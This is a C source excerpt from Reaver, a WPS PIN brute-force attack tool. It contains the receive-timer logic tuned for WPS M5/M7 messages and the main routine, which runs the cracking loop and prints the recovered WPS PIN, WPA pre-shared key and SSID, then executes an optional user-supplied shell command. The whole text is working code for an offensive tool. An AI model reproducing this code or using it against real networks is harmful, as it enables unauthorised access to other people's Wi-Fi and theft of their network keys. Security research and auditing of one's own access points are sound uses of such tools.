/* Starts receive timer. Called from send_packet() after a packet is trasmitted */ void start_timer() { struct itimerval timer; struct wps_data *wps = get_wps(); memset(&timer, 0, sizeof(struct itimerval)); /* * The M5 and M7 messages have very fast turn around times - * typically a few hundreths of a second. We don't want to wait * around forever to see if we get them or not, so use a short * timeout value when waiting for those messages. * Ignore this timeout if we know the AP responds with NACKs when * the wrong pin is supplied instead of not responding at all. */ if(get_timeout_is_nack() && (wps->state == RECV_M5 || wps->state == RECV_M7)) { timer.it_value.tv_usec = get_m57_timeout(); } else { /* * Other messages may take up to 2 seconds to respond - * wait a little longer for them. */ timer.it_value.tv_sec = get_rx_timeout(); } set_out_of_time(0); setitimer(ITIMER_REAL, &timer, 0); }
int reaver_main(int argc, char **argv) { int ret_val = EXIT_FAILURE, r = 0; time_t start_time = 0, end_time = 0; struct wps_data *wps = NULL; globule_init(); init_default_settings(); fprintf(stderr, "\nReaver v%s WiFi Protected Setup Attack Tool\n", get_version()); fprintf(stderr, "Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <*****@*****.**>\n\n"); if(argc < 2) { ret_val = reaver_usage(argv[0]); goto end; } /* Process the command line arguments */ if(process_arguments(argc, argv) == EXIT_FAILURE) { ret_val = reaver_usage(argv[0]); goto end; } /* Double check reaver_usage */ if(!get_iface() || (memcmp(get_bssid(), NULL_MAC, MAC_ADDR_LEN) == 0)) { reaver_usage(argv[0]); goto end; } /* If no MAC address was provided, get it ourselves */ if(memcmp(get_mac(), NULL_MAC, MAC_ADDR_LEN) == 0) { if(!read_iface_mac()) { fprintf(stderr, "[-] Failed to retrieve a MAC address for interface '%s'!\n", get_iface()); goto end; } } /* Sanity checking on the message timeout value */ if(get_m57_timeout() > M57_MAX_TIMEOUT) { set_m57_timeout(M57_MAX_TIMEOUT); } else if(get_m57_timeout() <= 0) { set_m57_timeout(M57_DEFAULT_TIMEOUT); } /* Sanity checking on the receive timeout value */ if(get_rx_timeout() <= 0) { set_rx_timeout(DEFAULT_TIMEOUT); } /* Initialize signal handlers */ sigint_init(); sigalrm_init(); /* Mark the start time */ start_time = time(NULL); /* Do it. */ crack(); /* Mark the end time */ end_time = time(NULL); /* Check our key status */ if(get_key_status() == KEY_DONE) { wps = get_wps(); cprintf(VERBOSE, "[+] Pin cracked in %d seconds\n", (int) (end_time - start_time)); cprintf(CRITICAL, "[+] WPS PIN: '%s'\n", get_pin()); if(wps->key) cprintf(CRITICAL, "[+] WPA PSK: '%s'\n", wps->key); if(wps->essid) cprintf(CRITICAL, "[+] AP SSID: '%s'\n", wps->essid); /* Run user-supplied command */ if(get_exec_string()) { r = system(get_exec_string()); } ret_val = EXIT_SUCCESS; } else { cprintf(CRITICAL, "[-] Failed to recover WPA key\n"); } save_session(); end: globule_deinit(); return ret_val; }